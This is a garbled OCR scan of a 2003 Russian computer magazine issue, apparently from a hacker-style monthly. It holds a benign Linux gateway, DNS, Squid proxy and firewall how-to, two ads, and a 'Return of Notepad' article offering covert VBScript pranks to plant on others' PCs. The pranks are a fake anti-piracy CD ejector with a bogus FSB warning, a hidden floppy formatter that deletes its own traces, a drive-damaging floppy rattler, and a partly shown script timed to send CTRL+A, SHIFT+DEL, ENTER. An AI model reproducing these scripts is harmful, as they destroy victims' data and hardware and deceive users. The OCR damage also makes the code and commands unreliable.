e-shop М" "Е, 


http://www.e-shop.ru МИЦ 


‚я Процессор: 32-Bit ARM 


| 


Память: 32-96 КВ VRAM (в CPU), 256 КВ 

Экран: 2.9” ТЕТ с отражающей матрицей (40.8° _ 
ммх 61.2 мм) 
Разрешение и цвет: 240x160 пикселей, 

32.768 возможных цветов |" @ 
Размеры (ШхВхТ): 144.5 x 82 x 24.5 мм * 
Вес: 140 г 

Питание: 2 батареи класса АА (15 часов) 

Носители данных: картриджи 

Другое: Стереозвук, совместим с играми для 

Game Boy и Game Boy Color 


a 


J 


Технические спецификации только для GBA SP: , 
* Интегрированная подсветка LCD экрана* Входящая в комплект перезаряжаемая Lithium 
lon батарея, способная работать 10 часов безостановочной игры, заряжаемая всего 3 часа 


Golden Sun: The 
Lost Age 


ountry е 
нтернету — круглосуточно! e-mail: sale 
Заказы по телефону можно сдела 


стоимость доставки == снижена на ! 


(095) 928-6089 (095) 928-0360 (095) 928-3574 
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ДА! Я ХОЧУ ПОЛУЧАТЬ БЕСПЛАТНЫЙ 


КАТАЛОГ GAMEBOY ств 


ИНДЕКС. ГОРОД, 


УЛИЦА. ДОМ КОРПУС. КВАРТИРА 


ФИО. 
ОТПРАВЬТЕ КУПОН ПО АДРЕСУ: 101000, МОСКВА, ГЛАВПОЧТАМТ, А/Я 652, ESHOP 


НОМ/ТО/В БОЙ И 


NYT ОДНИ СТАРИКИ 


ОСи 4work 


Если у тебя 
что-то не по- 
лучилось с 
ipfwadm, то 
поищи софти- 
ну для конфи- 
га фаерволла 
ipchains, заме- 
няющую 
ipfwadm, кото- 
рый использо- 
вался в старом 
коде IP Firewall. 


ейчас мы найдем 
этому всему 
применение. 


СУТЬ ТРАБЛЫ 

Ты наверняка слышал о таких кру- 
тых вещах, как аппаратные cpaep- 
воллы, гейты (или мосты), и всегда 
думал, что замутить подобную 
хрень трудно. Ведь надо иметь но- 
вейшее железо, крутейший софт и 
прямейшие руки. Но, оказывается, 
все просто, как пупок. Я развею 
миф о сложности и навороченности 
сих плюшек простым и элегантным 
способом: опишу, как настроить 
шлюз, прокси, фаерволл и почто- 
вый сервак на простенькой машин- 
ке: i486 с 16 мегами крутейших 

$ ММ оперативы на борту и еще go 
кучи сетевуха да мопед - все иск- 
лючительно 15а’шки. 

Как ты сам уже понял, железо на- 
шего сервака находится на грани 
фантастики... 80-x годов. На кой 
фиг тебе это все, если можно ку- 
пить крутейший сервак за кучу бак- 
сов? А зачем, если наша четверка, 
грамотно настроенная и оточенная, 
будет идти наравне с тачкой на 
Бартоне? Причина этого проста: 
для наших целей вовсе необяза- 
тельна огромная производитель- 
ность - проксить и фаерволить мо- 
жет и комп-пенсионер. Не, бабло с 
шесра, конечно, сруби и Бартика та- 
щи домой, а на его место отдирай 
артесфактную мать от стены. 

Далее определимся с софтом. Для 
своих извратных целей я избрал 
дистрибутив ALT Linux Master 2.2. 


ХАРД НАДО СТАВИТЬ, 
НА ТО ОНИ ХАРД! 

Все делается просто, как раз-два. 
Становись рутом: Su, пароль гооГ’а. 
Дальше DrakConf - это общий кон- 
фигуратор - в нем глянь, есть ли 
твоя сетевуха в списке (настройка 
оборудования -> автоопределение 
устройств). Если она найдена, идем 
дальше, иначе инет и его факи ждут 
тебя. У меня все встало идеально. 

Затем мы приступаем Henocpeg- 
ственно к установке сети, набрав 
команду netconf или просто в окне 


me 
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В БОЙ ИДУТ ОДНИ 
СТАРИКИ 


ПРЕВРАЩАЕМ ЧЕТВЕРКУ В СЕРВАК НА ЛИНУХЕ 


Vint (vint@townnet.ru) 


Network configurator кликаем no 
Basic host information и в открыв- 
шемся диалоге пишем сетевое имя 
компа, затем на вкладке Adaptor 1 
включаем (Enabled) сетевуху. После 
чего вводим инфу о сети и о плате 
(1Р-адрес, сетевая маска, IO Port, 
га). В поле NetDevice укажи тип се- 
тевого устройства - сейчас это ethO 
(от Ethernet), а в none Kernel Module 
- имя модуля ядра, которое соответ- 
ствует твоей сетевухе. И еще одна 
маленькая плюшка: если у тебя се- 
тевуха PCI, то lO Port и IRQ устанав- 
ливать не нужно. Все, твоя сетевуха 
настроена и готова к работе. 

Если у тебя будет две сетевые кар- 
ты, воткни вторую и повтори все 
снова, а если модем, то просто вклю- 
чи его - внешние могут работать без 
особых драйверов и настроек. 

А дальше следует заняться 
собственно настройкой нашей вели- 
кой машины. Установим-ка мы шлюз! 


КРУТЕЕМ И СТАВИМ ШЛЮЗ 
Вообще твой комп легко может свя- 
зать две сети в одну без помощи 
хаба, но для этого тебе нужно будет 
две сетевухи (или больше, смотря 
сколько сетей ты сливаешь) и чуток 
терпения дочитать эту статью. Так- 
же шлюз стоит организовывать, 
когда у тебя дома/на работе/в уни- 


вере есть локалка и только одна 
дырка в Инет. Чтобы все могли его 
юзать, ты и ставишь шлюз, после 
чего тебя все носят на руках. 


Вот тебе практический пример 
объединения двух сетей. Дано: IBM 
486 с 16 мегами мозгов, две сете- 
вые платы, бухта витухи и два дня 
сроку. Решение: ставим консоль- 
ную линуху, настраиваем сетевухи 
на ethO и её 1 и даем [Р-адреса: 


ifconfig ethO 192.168.1.1 up 
(подняли первую карточку) 
ifconfig ethl 192.168.2.1 up 
(подняли вторую карточку) 


Дальше необходимо настроить 
маршрутизацию между подсетями 
192.168.1.0 и 192.168.2.0, что позво- 
лит юзерам из одной подсети ви- 
деть расшаренные ресурсы в дру- 
гом сегменте. Говорим, что компы, 
которые находятся в нашем ло- 
кальном сегменте 192.168.1.*, сидят 
на первом интерфейсе и обращать- 
ся к ним следует напрямую: 


route add net 192.168.1.0 192.168.1.1 netmask 
255.255.255.0 0 


А вот с машинами из соседней 
сетки, имеющими адреса 192.168.2.*, 
будем разговаривать через е{Н1: 


route add net 192.168.2.0 192.168.2.1 netmask 
255. 255. 255.0 0 


Последний параметр - это метри- 
ка. Ее можно понимать как “рассто- 
яние до шлюза-назначения” или 
“сколько прыжков между шлюзами 


Заставка великого и могучего никсового текстового редактора vim. А ты помог детям? 


HOWTO/B БОЙ ИДУТ ОДНИ СТАРИКИ 


придется сделать пакету по пути и 
обратно". Так как адреса 192.168.1.1 
и 192.168.2.1 являются адресами 
этой тачки в разных сетях, то мет- 
рика равна 0. 

Пакеты gna IP-agpecos, которые 
не находятся в нашей локальной 
сети, будем отправлять на машину 
192168 .1.1, а она сама будет разби- 
раться, что с ними делать: 


route add default 192.168 1.11 


Обрати внимание, что значение 
метрики равно 1. 


DNS, ЧТОБ HE МУЧАТЬСЯ 
Дальше разберем проблему с IP- 
адресами и с соответствующими им 
именами компов - ведь символьный 
адрес гораздо проще запомнить, 
чем четырехбайтное число. Так что 
построим у себя в локалке DNS сис- 
тему. На всякий случай напомню, 
что вся работа сервера доменных 
имен (Domain Name System) сво- 
дится к преобразованию мнемони- 
ческих имен машин в IP-agpeca и 
обратно. То есть для того, чтобы 
узнать, какой IP у компа 
VasiaPipkin, необходимо спросить 
DNS сервер, и только после полу- 
чения ответа мы можем начинать 
работу. Учитывая, что на обраще- 
ние к серверу DNS провайдера тре- 
буется 10-15, а иногда и все 30 се- 
кунд (это зависит от загрузки сети 
и от скорости соединения), уста- 
новка сервера DNS в локальной се- 
ти с выходом в инет является прос- 
то необходимой. Обычно сервер 
DNS ставится на шлюзе, который 
используется для выхода в интер- 
нет. Перед началом настройки сер- 
ванта следует определить, запу- 
щен ли он: 


ps -ах | grep named 


Если запущен - тормози его ко- 
мандой kill или пас, а если он вооб- 
ще не установлен, то ставь пакет 
bind. Учти, что исполнимый файл 
называется Named, а сам пакет - 
Ыпа. Все, дальше идет чистая наст- 
ройка. 

В файле /etc/named.conf лежит 
основная информация о парамет- 


рах сервера (редактируй из-под ру- 
та). Вот пример: 


logging {category спате {null;};}; - 
этот параметр показывает OTCYT- 
ствие канонического имени 
options {directory “/var/named";}; - 
расположение файлов имен 

zone “." {type hint;file “named.ca";}; - 
Файл named.ca - корневой кэш, OH 
содержит информацию о корневых 
серверах DNS 

zone “shadrinsk.net" {type 
master;file “shadrinsk.net";notify 
по;}; - это зона, обслуживаемая Ha- 
шим серваком 

zone “0.0.127.in-addr.arpa” {type 
master;file “named.local"s}; - локаль- 
ная зона 

zone “1.168.192.in-addr.arpa” {type 
master;file “192.168.1";notify уез;}; - 
привязка к IP нашего серванта 


Следующий файл - shadrinsk.net. 
Его основное назначение - выпол- 
нять преобразования символьных 
имен в IP. Вот что внутри: 


@ IN SOA den.shadrinsk.net. host- 
master.shadrinsk.net. ( 
75031225; - серийный номер 


7200; - обновление каждые 2 часа 
(указано количество секунд) 

3600; - повтор каждый час 
360000; - хранить информацию 100 


часов 
86400); TTL (время жизни) записи 
- 24 часа 

IN NS den.shadrinsk.net 

IN A 192.168.1.1 

IN MX 150 den.shadrinsk.net 


Файл 192.168.1 - файл обратного 
соответствия. Он хранит настройки 
перевода IP в имя. Внутренности 
такие: 


@ IN SOA den.shadrinsk.net. host- 
master.shadrinsk.net ( 
75031225; - серийный номер 
7200; - обновление каждые 2 часа 
3600; - повтор каждый час 
360000; - хранить информацию 100 
часов 
86400); - TTL записи - 24 часа 
@ IN NS den.shadrinsk.net 
1 IN PTR den.shadrinsk.net; 
Запись PTR необходима при преоб- 
разовании ГР в имя. 
2.1.168.192 IN PTR evh.shadrinsk.net; 

Если указан не весь IP, TO к нему 
будет добавлен адрес подсети 


Миджинт командер - первый помощник любого админа 
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Есть набор по- 


лезных скриптов | 


для настройки 
фаерволла, дос- 
тупный Ha ftp- 
сервере ipchains: 
ftp://ftp. 
rustcorp.com/ 
ipchains/ 
ipchains-scripts- 


1.1.2.tar.gz. 


раде (УЕ 


улому U0 


HOWTO/B БОЙ ИДУТ ОДНИ СТАРИКИ 


ОСи 4work 


4] ядра ты всегда 


Мой пингвинчик приветствует админа 


1.168.192, причем байты в IP следует 
указывать в обратном порядке. 


Дальше необходимо установить 
файл кэша (в нем хранятся основ- 
ные хосты и соответствующие им IP 
в Инете). Для этого придется под- 
рубиться к Инету и запустить ДНС 
сервер у себя на машине. Затем 
вбивай вот такую комбинацию: 
nslookup | tee ns (что значит найти 
более новый файл кэша серваков и 
их IP). После этого делай: set q=ns 
(или set type=ns) - это покажет тебе 
список корневых серверов DNS, ко- 
торый будет помещен в файл ns. А 
дальше последний шаг: преобразо- 
вание сграбленного файла ns в по- 
нятный серваку вид, для этого, не 
мудрствуя лукаво, введи: 


Официальная 
страница 
пингвиньего 
фаерволла 
живет по 
адресу: 
http://www. 
rustcorp.com/ 
linux/ipchains. 


#./bin/awk awk ‘ BEGIN { /root/ { 
print “. INNS “ $4"." } /internet/ { 
print $1." “999999 INA“ $5 } ЕО ' 
И поюзай софтину reformat вот так: 
reformat ns патед.са. Теперь оста- 
лось скопировать патеч.са в ката- 
лог /var/named. Дальше все долж- 
но заработать. 


ЭКОНОМИМ КОПЕЙКУ 

Раз уж мы решили устроить боль- 
шой трах для нашей четверки, 
превратим несчастный айбиэм ком- 
патабл компутер в настоящий прок- 
си-сервер с установленным на нем 
фаерволлом. 

Для начала чуток инфы. Прокси- 
сервер необходимо ставить, если у 
тебя есть локальная сеть, сервак и 
только один канал связи (или один 
реальный IP). В других случаях ста- 
вить прокси особого смысла нет. Если 
же твой домашний комп вообще не 
подключен к сети, то проксик только 
затормозит твою работу в Инете и не 
принесет никакой ощутимой выгоды. 
Но если у тебя есть "настоящая" ло- 
калка минимум из трех компов, то 
смело читай дальше - установив K3- 
ширующую проксю, ты не только уве- 
личишь скорость доступа к Инету, но 
и сэкономишь траф за счет кэша. 

Клаву и мозги к бою: начинаем 
ставить squid (http://www.squid- 
cache.org). С самим процессом уста- 
новки возникнуть проблем не 
должно: 


Свежие сорцы 


можешь слить 
с одноименно- 
го сайта 
http://www. 
kernel.org. 


./configure; - дистр конфижится под 
твое ядро; 


ГЕЕВ 
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make; - сборка бинарика из сорцов; 
make install; - прога устанавливает 
себя, как хочет (все из-под рута). 


Бинарик ставят так: 
rpm -i имя_файла.грт 


А вот более сложный процесс 
конфигурирования сквида я опишу. 
Естественно, все настройки будем 
проводить редактируя конфигура- 
ционные сайлы всенародным Vi. 
Место нахождения этих файлов 
сильно отличается, в зависимости 
от дистрибутива (могут быть в /е{с, 
в /usr/local/etc/squid, в /usr/local/ 
squid/etc). Так что их придется по- 
искать. Заюзаем команду поиска 
главного файла squid.conf: 


find / -пате “squid. conf" -print 


Поиск веди от рута. A дальше rpy- 
зи его в Vi да не пугайся, что там 
3000 строк, - настроек гораздо 
меньше. Вот самые необходимые: 


# IP-agpec и порт, на котором будет 
доступен прокси-сервер для клиен- 
тов: 

http_port 192.168.0.2:3128 


+ Уберем “общение” с соседними 
прокси-серверами: 
icp_port 0 htcp_port 0 


# Отключим кэширование динами- 
чески загружаемых страниц: 

acl QUERY urlpath_regex cgi-bin \? no_cache 
deny QUERY 


# Укажем местонахождение и раз- 
мер кэша (200Мб): 
cache_dir ufs /var/squid 200 32 384 


+ Местонахождение логов запро- 
COB к прокси-серверу: 
cache_access_log 
/usr/local/squid/logs/access.log 


# Местонахождение логов кэша: 
cache_log /usr/local/squid/logs/cache.log 


Вот так следует конфигурировать сервак 


# Отключим лог менеджера кэша 
(большинство уверяет, что он не 
нужен): 

cache_store_log попе 


# Пароль для анонимного ftp-coe- 
динения: 
ftp_user ano@shadrinsk.net 


# Откроем доступ к прокси-серверу 
с клиентов из нашей подсети: 
acl all src 192.168.0.0/16 http_access allow all 


Но это еще не все :), проблема в 
том, что демон сквида по умолча- 
нию запускается с правами nobody 
из группы nogroup (это один из са- 
мых бесправных юзеров в Линухе). 
Нам следует это учесть и разре- 
шить доступ к файлам прокси тако- 
му юзеру. Делаем это так: 


chmod nobody:nogroup 
/usr/local/squid/logs 

mkdir /var/squid 

chmod nobody:nogroup /var/squid 


Дальше последует первый (об 
этом говорит параметр 7) запуск: 


/usr/local/squid/bin/squid -z 


Если все прошло успешно, мо- 
жешь скакать от радости - твоя 
четверка превратилась в могучий 
прокси-сервант, основанный на ус- 
тойчивой ОС Линукс. 


ЗАЩИЩАЕМ ФАЗЕНДУ 

Прокси - вещь хорошая, это тебе и 
анонимность, и распределение тра- 
фа, и экономия. Но это не все, на 
что способна наша четверочка: сей- 
час мы настроим на базе сей машин- 
ки межсетевой экран aka фаерволл. 
Пингвиний фаерволл использует 
принцип фильтрации пакетов, то 
есть он просматривает заголовки 
пакетов по мере их прихода и реша- 
ет дальнейшую судьбу всего пакета. 
Защитник может прибить пакет, при- 
нять пакет или сделать с ним что-то 
еще более сложное, типа маскара- 
динга или хитрого редиректа ;). То, 
что Линух - правильная ОС, доказы- 


вается уже тем, что защита сетей 
заложена в ее ядре. Чтобы заюзать 
эту мазу, тебе нужно скомпилиро- 
вать ядро, указав одобрение в пунк- 
тах IP forwarding/gatewaying (CON- 
FIG_IP_FORWARD) u IP firewalling 
(CONFIG_IP_FIREWALL). Если вклю- 
чить эти пункты и задать определен- 
ные правила, Линь будет шерстить 
вообще все пакеты, проходящие с 
одного интерфейса на другой (если 
тебе так проще, то с одной машины 
на другую). Этого вполне достаточ- 
но, чтобы защитить всю локалку с 
помощью одного компа - гейта в 
Инет, что нам идеально подходит. 
Чтобы включить и настроить за- 
щиту, юзь софтину по имени 
ipfwadm. При настройке учитывай 
следующие вещи: если у тебя в се- 
ти нет особенных наворотов, то ча- 
ще всего достаточно закрыть ТСР- 
порты с 1 по 1024, чтобы отрубить 
доступ к основным ТСР-серверам и 
порты с 5000 по 65535 для запре- 
та доступа к Х-серверам. Порты 
1025-4999 можно оставить откры- 
тыми. Но если у тебя в сети крутит- 
ся веб, фтп или другой подобный 
сервак, то следует к указанным вы- 
ше добавить используемые ими 
порты (например, для web - 80-Й). 
Более подробно смотри в /etc/serv- 
ice. Все команды настройки защиты 
следует записать в отдельный ко- 
мандный файл (например, 
/etc/rc.d/rc.firewall) и вызывать его 
при выходе системы в мультире- 
жим из файла /etc/rc.d.rc.inetl. Вот 
маленький отрывок такого файла с 
необходимыми ремарками: 


NET=195.161.26.87 #Инет 
168.0.0 


льная сеть и ее 


со 


с блокировок 
скать всех внутрь локалки (вход - 


[= 


2 52 D/ 
H#HOMepa портов 
ЗЕще не пустим пакеты, направленные Ha 


0 S{LOCALN 


р tcp -а deny -5 
{LOCALNET}/24 


портов 


Ре. 
о = 


Дальше пошла настрой 


ee 


Е <> 


дям, у кото- 
рых IP попадает в промежуток от 25 go 30. 
Последняя цифра not ет количество 
обломанных юзеров. 

/sbin/ipfwadm -В -a deny -S 


EG 966 DEG DEE /N -f “INET 2Е/ 
255.255.255.255/0 -D S{NET}.25/5 


НЙ 


КАК ЭТО БЫВАЕТ ПО ЖИЗНИ 
А сейчас я расскажу, как было в ре- 
альной жизни. Была маленькая се- 
точка из 25 компов (подъезд + ма- 
ленькая фирма) и была эта сеть 
изолирована от Инета, и не было ни 
у кого проблем с безопасностью, но 
решили на общем собрании юзеры 
инет заиметь. Решили и сделали. 
Еще был один умный чувак, сказав- 
ший, что нам надо поставить гейта 
между всем Инетом и маленьким 
мирком локалки. Воздвигли мы объ- 
единенными усилиями мозгов и пи- 
ва гейт на базе четверки, и стала се- 
точка наша защищена от внешнего 
вторжения фаерволлом, кэширую- 
щий прокси существенно экономил 
входящий траф: за месяц экономия 
составила около 50-150 мегов, то 
есть на пиво с бубликом админам 
хватало. И еще один бонус: так как 
мы юзаем только один IP из сети 
провайдера, то договорились на 
абонентскую плату в 500 рублей + 
пиво, а должны были 25*100=2500 
рублей. А что до тормозов, то маши- 
на справлялась, даже когда все 25 
юзеров выходили в Инет разом, 
правда, канал не резиновый, и 
пришлось мне чуток схитрить: пос- 
тавить на свой IP приоритет повы- 
ше, чтобы в Инете без тормозов си- 
деть, но это другая история. Вот так. 
Надеюсь, ты понял, что во всех от- 
ношениях установка компа на гра- 
нице сетей - очень хороший ход. 
Вот так все просто и круто. Убедил- 
ся, что сила не в гигагерцах, а в пря- 
мых руках и Линухе? Так можно сде- 
лать очень много. Удачи тебе в нелег- 
ком труде начинающего сисадмина. 


FRORMAH TAA КА, РИКА ST TREN SHES 


COMPUTER пике Exition 


ЕЕ ЕЕ ЕЕ 
ИГРОВЫЕ ВСЕЛЕННЫЕ 
Вселенная Аллодов. 

Часть 1. 

Из всех миров, созданных 
российскими разработчиками, 

самым известным и, пожалуй, 

уже успевшим превратиться в 
настоящую живую легенду, 

является вселенная Аллодов. 


Вселенная Warcraft 
Предыстория Warcraft. 
Часть третья. 


ЭКСКЛЮЗИВ 

ЗреШогсе 

Информация об одной из самых 
магически-кроваво-фэнтезийных 
игр к вашему вниманию. 


Тест: 13 новейших 3D-akcenepa- 
торов. Ноутбуки для игр. Первый 
взгляд: Abit-IS7-G. Genius Comfy 
KB-18M. "Крякнутый кейс". 


А также: новости, preview, review, 
Loading, советы по прохождению 
игр, Как это делается... FragMaker, 
Игровая Альтернатива, топ 20, 
Игровой трубопровод и т.д. 


НОМ/ТО/ВОЗВРАЩЕНИЕ БЛОКНОТА 


ОСи 4work 


Предлагаемый 
код в компи- 
ляции не нуж- 
дается и пи- 
шется в лю- 
бом текстовом 
редакторе. 


раде СУТ 


Анализирующий Прив еликий за 
(analyst1945@mail.ru) 


кратце напомню, что 

весь предлагаемый 

далее код в компиля- 
ции не нуждается и пишется в лю- 
бом текстовом редакторе (лишь бы 
формат выходного файла был текс- 
товый.), сохраняется в текстовом 
файле с расширением WSF и запус- 
кается так же, как и ЕХЕ-файлы. Не 
забудь добавлять обязательные 
ХМЕ элементы: 


<?xml version="1.0" encoding="IS0-8859-1"?> 
job id="T1"> 

<script language="VBScript"> 

<IICDATAL 


в начало файла и 


IP 
</script> 
</job> 


в конец файла соответственно. 
Итак, приступим. 


БОРЬБА С ПИРАТСТВОМ 

Скажи, где ты брал диск с дистрибу- 
тивом твоей ОСи? А за сколько? 
Что-что? ЛИЦЕНЗИОННАЯ?! И все 
остальные диски ТОЖЕ? Ну, тогда 
бросай журнал и иди кататься с де- 
вочками (мальчиками :)) на яхте. 
Это будет для тебя более полезным 
занятием. Реально же, по офици- 
альным данным, пиратский рынок в 
России составляет 89 процентов. То 
есть с вероятностью 1:10 можно ут- 
вержодать, что вставленная в диско- 
вод компашка, если это не 
собственный сборник, является пи- 


ВОЗВРАЩЕНИЕ 
БЛОКНОТА 


ГОТОВИМ ЗАПАДЛО НА СКРИПТАХ 


ратской копией. Мы же с тобой зай- 
мемся тем, что будем при попытке 
использования такого диска извле- 
кать его с выдачей ну оч-ч-ч-ень 
строгого предупреждения :). Делать 
это будем, конечно же, с помощью 
сценариев на языке VBScript. Итак, 
пиши следующий код: 


Option Explicit 

Dim fso,mplayer 

Dim Drive 

Dim Count, f 

f=0 

‘Объявляются используемые переменные 

On Error Resume Next 

‘Блокировка сообщений об ошибках 

set fso=CreateObject 
(“Scripting.FileSystemObject") 

set mplayer=CreateObject(“WMPlayer.0CX.7") 


Так выглядит предупреждение пользователя 


ИА 
Lig Le | 08(33) 2003 


а а 
а а а 
fea стей ве ВЕЩИЕ Beet hai Ped ee cherti 
Ceol ee oe wel ee pours ele thal 
CA cng а ot 
vit Diede rt all eet pest ee debe 
Figctige Fe freee pl ples et фене вый 
ion 


в We Eng on eee Pe 
ed ieee bce bere pega | | Go 
Sd rts geery bod cl АЯ: pou coe 
ыы a ured eg Thee 
и op 
Terie of othe Е alt squall; 
Petre le 


| Lan ВЕ Pateee 


Microsoft Script Encoder обладает обширной справочной службой 


wel re eee ot ey 


‘Подключение системных объектов 

Do while f=0 

‘Создается бесконечный цикл 

‘для работы скрипта go перезагрузки 
WScript.sleep 5000 

‘Пауза между проверками наличия диска в 
дисководе в миллисекундах 

Count=-1 

"Начальное положение счетчика 

"Нужен на случай нескольких сидюков 
For Each Drive in FSO.Drives 

‘Проверка всех дисков компа 

If Drive.DriveType=4 then 

‘Если это сидюк 

count=count+1 

'То увеличиваем счетчик 

if Drive.lsReady Then 

‘Если он вставлен 

If (fso.fileexists(Drive.DriveLetter & ":\" & 
“Autorun.inf")) then 

'И на нем есть файл Autorun.inf 

‘Значит есть автозапуск 

‘Vi это не ручной сборник 

‘(кто ставит на ручной сборник автоза- 
пуск? %)) 

"И не музыкальный диск 
mplayer.cdromcollection.item(count).eject() 
‘Извлекается лоток 

msgbox "Обнаружена пиратская копия дис- 
ка. Дальнейшая работа с диском невоз- 
можна.” &_ 

vberlf & “Сообщите в местные органы ФСБ 


о месте его покупки.",48,_ 
“Антипиратская система Windows” 

'И выдается грозное предупреждение 
End if 

End If 

End If 

Next 


Loop 


Можешь не сомневаться, что твой 
ламернутый друган или не менее 
ламернутая секретарша будут рас- 
сказывать об этой “защите” всем и 
каждому, а первым делом побегут в 
магазин, продавший этот диск, а 
может и в ФСБ позвонят ;). 

При желании можешь усовершен- 
ствовать этот скрипт. Например, 
можно считать количество попыток 
использования диска и каждый раз 
выдавать новое предупреждение. В 
общем, пофантазируй. 


ИЗДЕВАЕМСЯ НАД РОО 
ИЕГО ХОЗЯИНОМ 
С оптическими дисками разобра- 
лись, но остались дискеты. Что 
можно делать с дискетами? Извле- 
кать не получится по причине отсу- 
тствия какой либо связи данной ме- 
ханической части с электроникой. 
Остается логическая составляю- 
щая. Самым оптимальным вариан- 
том мне представляется формати- 
рование, причем скрытое. Открыл 
так чел документ с дискетки, рабо- 
тает потихоньку, глянь - а файлов- 
то и нет! Только осторожно: воз- 
можны приступы вандализма, чле- 
новредительство :), громкие раз- 
мышления на тему вирусов, виру- 
сописателей и интимной жизни их 
родственников. 

Приступим. 


Option Explicit 

Dim WshShell, fso,flopp, odrive 

Dim commandfile, batfile, txtcom, txtbat 
Dim disklabel, x 

‘Объявляем используемые переменные 
commandfile="c:\LOG.LOG" 

‘Имя файла с командами, передаваемыми 
программе форматирования 
batfile="c:\file.bat” 

‘Имя запускаемого файла 
disklabel="Loh" 

"Метка для форматируемого диска 

x=0 


НОМ/ТО/ВОЗВРАЩЕНИЕ БЛОКНОТА 


On Error Resume Next 

‘Блокировка сообщений об ошибках 

set WshShell=WScript.CreateObject 

(“WScript.Shell") 

Set fso = CreateObject 
(“Scripting.FileSystemObject”) 

'Подключаются системные объекты 

Do While х=0 

‘Создается бесконечный цикл 

‘для работы скрипта go перезагрузки 

Wscript.sleep 10000 

‘Tlay3a между проверками наличия диска 

в дисководе в миллисекундах 

If WshShell.AppActivate(“A:") then 

‘Если юзер открыл окно дискеты 

‘Значит он вставил ее в дисковод 

Set Норр = fso.GetDrive(“A") 

‘Получаем доступ к флоппу 

If Норр.15Веаду and flopp.FreeSpace <> 

flopp.TotalSize then 

‘Если OH не чистый 

‘To создается файл с ответами 

Set txtcom = fso.opentextfile(command- 

Не,2 гие) 

txtcom.writeline 

txtcom.writeline “у” 

txtcom.close 

‘и пакетный файл с командой форматиро- 

вания 

‘и заметания следов 

Set txtbat = fso.opentextfile(batfile,2,true) 

txtbat.writeline “format a: /q /v:" & disklabel 

&"<" & commandfile 

txtbat.writeline “del “ & commandfile 

txtbat.writeline “del “ & batfile 

txtbat.close 

WshShell.run batfile,0 

‘Tenlepb полученная парочка принимается 

за работу 


‘Причем в скрытом режиме 

End if 

End if 

‘Заново повторяется BCA процедура 
Loop 


Эта фича будет работать при yc- 
ловиях: 

1. Дискета не защищена от запи- 
си. 

2. В "Свойствах папки" - “Вид” - 
отмечена опция “Выводить полный 
путь в строке заголовка". 

3. Окно проводника с содержимым 
дискеты открыто, пусть даже в 


Консоль Windows ХР с успехом 
выполняет многие команды MS-DOS 


свернутом виде, как минимум 10 се- 
KyHg. Если интервал не устраивает, 
измени строку 

Wscript.sleep 10000 

например, Ha 
Wscript.sleep 5000 

4. Корень диска С He защищен OT 
записи (бывает и такое). В против- 
ном случае замени имена (располо- 
жение) файлов c:\LOG.LOG и 
c:\file.bat на другие. В принципе, 
имена и расширения могут быть 
любыми. 

5. Данному пользователю разре- 
шено форматировать дискеты 
(Windows 2К/ХР). 

6. Если террор производится на 
компе под управлением Windows 
ХР, то дискета форматируется даже 
при открытых на ней файлах. Если 
же используется Винда из серии 
Эх/МЕ, то нужно заменить строку 
txtcom.writeline “у” 

на 
txtcom.writeline “п” 
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Можешь He 
сомневаться, 
что твой ла- 

мернутый дру- 
ган будет рас- 
сказывать об 
этой “защите” 
всем и каждо- 
му, а первым 
делом побежит 
в магазин, 
продавший 
ему этот диск. 
А может ив 
ФСБ позвонит. 


Дискета фор- 
матируется 
даже при отк- 
рытых на ней 
файлах. 


раде 


Уулому UDO 


НОМ/ТО/ВОЗВРАЩЕНИЕ БЛОКНОТА 


ОСи 4work 


Возможны 
приступы ван- 
дализма, чле- 
новредитель- 
ство, громкие 
размышления 
на тему виру- 
сов, вирусопи- 
сателей и ин- 
тимной жизни 
их родствен- 
ников. 


)| На случай, ес- 


ли владелец 
компа добрал- 
ся gO твоих 
скриптов, ты 
можешь изба- 
вить его от 
удовольствия 
читать их ис- 
ходники. 


раде 


Форматирование будет отложено 
gO закрытия файлов. 

Краткое пояснение принципа 
действия сценария. Как известно, в 
системе MS-DOS вывод на экран 
можно перенаправить в текстовый 
файл, указав после команды сим- 
вол “>” в режиме нового файла или 
">>" в режиме добавления к имею- 
щемуся файлу и имя получаемого 
файла. Например, командой “dir 
c:\windows > c:\1.txt" будет получен 
файл C:\1.txt, содержащий листинг 
файлов и папок каталога C:\win- 
dows. Но далеко не всем известно, 
что возможно обратное перенап- 
равление с использованием симво- 
ла "<". На этом принципе и основан 
данный скрипт. В текстовый файл 
заносятся предполагаемые нажа- 
тия на клавиатуру, а затем они счи- 
тываются программой Format. В 
итоге все действия происходят без 
участия пользователя, что нам и 
требовалось. Ну а консоль Windows 
ХР с успехом выполняет эти функ- 
ции MS-DOS. 

Что же делать, если дискета не 
вставлена? Неужели лишать себя 
законного удовольствия? Не стоит. 
Пусть дисковод в знак возмущения 


А теперь ее нету. И корзина пустая 


ГЕЕВ 
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издает громкие звуки. Для разно- 
образия, так сказать. 


Option explicit 
Dim fso, odrive 


‘у - Приблизительная длительность тарах- 
тения флоппаря 

Set {50 = 
CreateObject(Scripting.FileSystemObject”) 
set odrive = fso.getdrive(“a:\") 
‘TlogkntoyatoTca системные объекты 

for x=1 to у 

"Процесс пошел 

if odrive.isready then 

‘Проверяется наличие дискеты 

‘Отсюда и происходит весь шум 

2=1 

‘Фиктивная операция 

‘He ради этого все затевалось 

end if 

'Завершаем микроцикл 

next 

‘Поехали по кругу 


Скрипт будет работать, если: на 
компе есть дисковод, он висит на 
букве А ив нем нет дискеты. 

Конечно, при желании эту штучку 
можно облагородить, а именно: go- 
бавить определение наличия дис- 
ковода, его букву и присутствие в 
нем дискеты, включать трещалку 
через определенные или случай- 
ные промежутки времени, заста- 
вить дисковод наигрывать опреде- 
ленную мелодию. И имей в виду, 
что этим приколом реально угро- 
бить FDD. 


ЗАВЕТНЫЕ КНОПОЧКИ 

А теперь приступим к термоядерно- 
му межгалактическому терроризму 
в рамках отдельно взятого писюка. 
Будем периодически посылать с 
клавиатуры разрушительную ком- 
бинации клавиш подобно этой: 


CTRL+A, SHIFT+DEL, ENTER. Это 


приведет к соответствующим pe- 
зультатам: удалению файлов и па- 
пок, текстов (смотря какое окно бы- 
ло на первом плане), выскакива- 
нию глаз из орбит, порче матери- 
альных ценностей, биению головой 
о стену, массовым явлениям суици- 
да и другим подобным веселеньким 
(кому как :)) вещам. А поможет нам 
в этом этот скриптик: 


Option Explicit 

Dim WshShell 

Dim f, x 

f=0 

‘OObABNAIOTCA используемые переменные 

On Error Resume Next 

"Блокировка сообщений об ошибках 

Set WshShell= 
WScript.CreateObject(“WScript.Shell") 

‘TlogkmO4atoTca системные объекты 

Do While f=0 

‘Создается бесконечный цикл 

‘для работы скрипта go перезагрузки 

Wscript.Sleep Int((1800000)*Rnd) 

